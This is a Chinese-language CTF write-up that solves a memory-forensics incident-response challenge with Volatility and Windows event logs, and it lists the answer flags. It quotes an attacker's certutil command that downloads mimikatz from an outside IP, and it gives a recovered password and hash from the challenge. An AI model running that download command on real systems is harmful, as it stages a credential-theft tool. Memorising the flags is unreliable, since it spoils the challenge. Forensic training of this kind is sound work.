内存镜像分析实战:破解攻击者入侵路径,全程可复现!

发布于 作者:

内存镜像分析实战:破解攻击者入侵路径,全程可复现!

原创 夜风Sec 夜风Sec 2025-05-13 02:44

关注公众号夜风Sec
,持续分享各种工具和学习记录,共同进步:)

在公众号回复solar获取相关附件

题目信息

题目资源

题目来源:第一届Solar应急响应比赛

题目文件:SERVER-2008-20241220-162057

背景 & 题目

  1. 请找到rdp连接的跳板地址 — flag格式 flag{1.1.1.1}

  2. 请找到攻击者下载黑客工具的IP地址 — flag格式 flag{1.1.1.1}

  3. 攻击者获取的“FusionManager节点操作系统帐户(业务帐户)”的密码是什么 — flag格式 flag{xxxx}

  4. 请找到攻击者创建的用户 — flag格式 flag{xxxx}

  5. 请找到攻击者利用跳板rdp登录的时间 — flag格式 flag{2024/01/01 00:00:00}

  6. 请找到攻击者创建的用户的密码哈希值 — flag格式 flag{XXXX}

解题过程

flag1

请找到rdp连接的跳板地址

volatility

附件是raw原始文件,先通过volatility进行分析

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw –profile=Win7SP1x64

mem00

mem00

我们需要找到rdp(3389 Port)链接的相关信息,通过netscan命令查看网络链接情况

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw –profile=Win7SP1x64 netscan

mem01

mem01

本地通过运行了svchost.exe建立了对3389端口的监听,远程IP 192.168.60.220:34121连接本地的3389端口 

flag{192.168.60.220}

flag2

请找到攻击者下载黑客工具的IP地址

这个肯定也要看网络链接,可以在上面的网络扫描的结果中一个一个尝试

或者直接使用

下载黑客工具 => 命令 ->  cmdcsan

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw –profile=Win7SP1x64 cmdscan

mem02

mem02

certutil -urlcache -split -f http://155.94.204.67:85/mimikatz.exe C:\Windows\Temp\mi.exe
– certutil是Windows系统自带的,可用于远程下载文件 

flag{155.94.204.67}

flag3

攻击者获取的“FusionManager节点操作系统帐户(业务帐户)”的密码是什么

mem02

mem02

看到这里面有一个命令type pass.txt
 -> 查看pass.txt的内容 -> 这里多半就是密码

所以就是找到文件偏移,然后导出文件进行查看

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw –profile=Win7SP1x64 filescan | findstr pass

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw –profile=Win7SP1x64 dumpfiles -Q 0x000000007e4cedd0 –dump-dir=./
– dumpfiles -> 导出

  • -Q:接文件偏移( 通过filescan得出的 )

  • –dump-dir:导出的目录

mem03

mem03

mem04

mem04 

flag{GalaxManager_2012}

flag4

请找到攻击者创建的用户

法1 – hashdump

通过hashdump命令 导出本地所有用户的哈希值

mem05

mem05

法2 – 导出security.evtx分析

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw –profile=Win7SP1x64 filescan | findstr Security

mem06

mem06

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw –profile=Win7SP1x64 dumpfiles -Q 0x000000007e744ba0 –dump-dir=./

修改后缀为evtx,打开,可能是导出的原因有些损坏( 无法直接筛选事件ID )

手动查找4720的事件ID进行查看

4720: 用户账户已创建

mem07

mem07 

flag{ASP.NET}

flag5

请找到攻击者利用跳板rdp登录的时间

查找4624事件ID,一个一个排查就行

mem08

mem08 

flag{2024/12/21 00:15:34}

flag6

请找到攻击者创建的用户的密码哈希值

这个在之前得到的hashdump就出现过

mem05

mem05 

flag{5ffe97489cbec1e08d0c6339ec39416d}

相关资源

【应急响应】- 日志流量如何下手?

从勒索到溯源:一次完整的Windows+MSSQL安全取证记录